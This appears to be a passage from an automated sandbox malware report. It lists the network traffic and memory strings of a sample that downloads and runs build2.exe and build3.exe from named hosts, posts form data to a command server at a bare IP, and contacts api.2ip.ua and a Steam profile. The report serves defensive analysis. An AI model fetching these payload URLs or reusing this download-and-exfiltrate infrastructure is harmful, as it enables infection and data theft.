00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View	IP Address: 186.13.17.220 186.13.17.220
Source: Joe Sandbox View	IP Address: 104.21.65.24 104.21.65.24

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TechtelLMDSComunicacionesInteractivasSAAR TechtelLMDSComunicacionesInteractivasSAAR
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 7449Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: UXNob1Dp32.exe, 00000006.00000003.1731626574.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: UXNob1Dp32.exe, 00000005.00000003.1731782317.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: UXNob1Dp32.exe, 00000005.00000003.1731881765.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: UXNob1Dp32.exe, 00000005.00000003.2140752652.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142129003.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2203120447.0000000003129000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194555640.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171232351.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2100184985.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183240197.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121385016.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182771733.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188633611.0000000003128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runL
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D32.exe
Source: UXNob1Dp32.exe, 00000005.00000003.2140752652.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142129003.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2203120447.0000000003129000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194555640.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171232351.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2100184985.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183240197.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121385016.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182771733.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188633611.0000000003128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe?
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exerun80I
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000696000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php
Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueD
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.phpA
Source: UXNob1Dp32.exe, 00000005.00000003.1737013197.00000000097F0000.00000004.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1737286972.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: UXNob1Dp32.exe, 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe/
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exerun35g
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: UXNob1Dp32.exe, 00000006.00000003.1731553154.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1731640705.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: UXNob1Dp32.exe, 00000006.00000003.1731679885.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1731709480.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: UXNob1Dp32.exe, 00000006.00000003.1731742311.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1937611262.000000001E8ED000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: UXNob1Dp32.exe, 00000005.00000003.1731782317.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: UXNob1Dp32.exe, 00000006.00000003.1731828683.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1731881765.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1934156488.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149
Source: build2.exe, 00000009.00000002.1934156488.000000000051A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149.exe
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/.
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/2
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/:
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/D
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/G/
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/L
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/n
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/nd-point:
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/pet
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/s
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/sqln.dll
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/x.c
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/~
Source: build2.exe, 00000009.00000002.1934156488.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149PUA4832FF8~YAAQLwwtFycGjvGKAQAAIGQc
Source: build2.exe, 00000009.00000002.1934156488.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149a
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: UXNob1Dp32.exe, 00000001.00000003.1643163181.000000000074B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000003.1641969430.000000000074A000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000738000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.aka
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
